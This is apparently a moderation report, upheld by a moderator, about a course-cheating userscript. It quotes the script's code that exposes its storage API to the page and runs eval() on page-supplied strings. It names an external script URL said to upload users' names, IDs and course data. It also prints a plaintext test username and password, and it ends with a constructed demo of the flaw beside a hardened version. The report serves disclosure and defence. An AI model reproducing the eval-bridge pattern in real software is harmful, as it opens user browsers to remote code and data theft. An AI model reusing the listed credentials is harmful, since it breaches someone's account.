FCQ网课通助手[全网题库][通用智能适配答题][刷课] was reported on 2024-07-28 for: Unauthorized external code
At line 911:

    function opeationUi(menu) {
        this.fcq_xm_answer = null;
        this.$ = $;
        this.menu = menu;
        this.xm_window=window
        this.initMenu();
        this.config = {}
        unsafeWindow.mainProcedure=this
        window.mainProcedure=this
        return this;
    }

This function assigns the window to xm_window and then assigns this to unsafeWindow, covertly setting this as the original webpage's mainProcedure. Then, through window.mainProcedure.xm_window.GM_setValue, the function allows dynamic code to be supplied from the front end.
The specific execution location is at line 1531:

    var initSet=`var VideoSpeed=1`;
    if(!GM_getValue('initSet')){ GM_setValue('initSet',initSet) };
    eval(GM_getValue('initSet'))

This code is supposed to execute var initSet = `var VideoSpeed=1`, but after the front end calls gm_setvalue to modify it, this value has become malicious code. The actual code reference URL is: https://tcb-w644nfbyxrttaih-2cpr71dbf4b7-1304481250.tcloudbaseapp.com/static/js/pages-index-list.b35c5d5a.js. This behavior in fact violates the rules.

After analyzing this code, it is found that it obtains the user's name, user ID and other information and uploads it to a third-party server. Additionally, it silently collects all course information in the background and uploads it without the user's consent.
Please explain the reason.
Test website: https://i.mooc.chaoxing.com/
TestUserName and TestPassword: 15637670952 wdm20020810
The evidence provided is that additional functionality has been added, which the script does not have
The script has been modified since the report was submitted.
This script has had 3 previous upheld or fixed reports.
webstudy (the reported user) has made:
A moderator has upheld this report.
The script has functionality to run eval() on unknown external code.
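As an added illustration of the two patterns the report describes (not code from the reported script or from Greasy Fork), this small model shows why writing the script object onto the page's global and then eval()-ing a stored setting combine into page-controlled code execution, and what a data-only, validated setting looks like instead. All storage, window and function names below are constructed stand-ins.

```javascript
// Constructed stand-in for the userscript manager's per-script storage,
// which page scripts normally cannot reach.
const gmStore = new Map();
function GM_setValue(key, value) { gmStore.set(key, value); }
function GM_getValue(key) { return gmStore.get(key); }

// Constructed stand-in for the page's global object (the unsafeWindow).
const pageWindow = {};

// Pattern from line 911: an object holding the GM API is written onto the
// page's global, so ordinary page scripts can call GM_setValue themselves.
function installLeakyBridge() {
  pageWindow.mainProcedure = { xm_window: { GM_setValue, GM_getValue } };
}

// Pattern from line 1531: a stored "setting" is run through eval(), so
// whatever string is in storage at that moment executes as script code.
function loadSettingWithEval() {
  if (!GM_getValue('initSet')) GM_setValue('initSet', '"default"');
  return eval(GM_getValue('initSet'));
}

// Hardened equivalent: nothing is exposed to the page, and the setting is
// JSON data checked against a fixed shape and range rather than code.
const DEFAULTS = { videoSpeed: 1 };
function loadSettingSafely() {
  let parsed;
  try { parsed = JSON.parse(GM_getValue('initSetJson') ?? '{}'); }
  catch { parsed = {}; }
  const speed = Number(parsed.videoSpeed);
  const ok = Number.isFinite(speed) && speed >= 0.5 && speed <= 16;
  return { videoSpeed: ok ? speed : DEFAULTS.videoSpeed };
}

// Models a page-side write through the leaked API, as the report describes.
// Returns false when no bridge exists, i.e. the page cannot touch storage.
function simulatePageWrite() {
  const api = pageWindow.mainProcedure && pageWindow.mainProcedure.xm_window;
  if (!api) return false;
  api.GM_setValue('initSet', '"page-controlled string was evaluated"');
  api.GM_setValue('initSetJson', '{"videoSpeed":"not a number"}');
  return true;
}
```

With the bridge installed, loadSettingWithEval() returns the page-supplied string because eval() executed it, while loadSettingSafely() rejects the tampered value and falls back to the default.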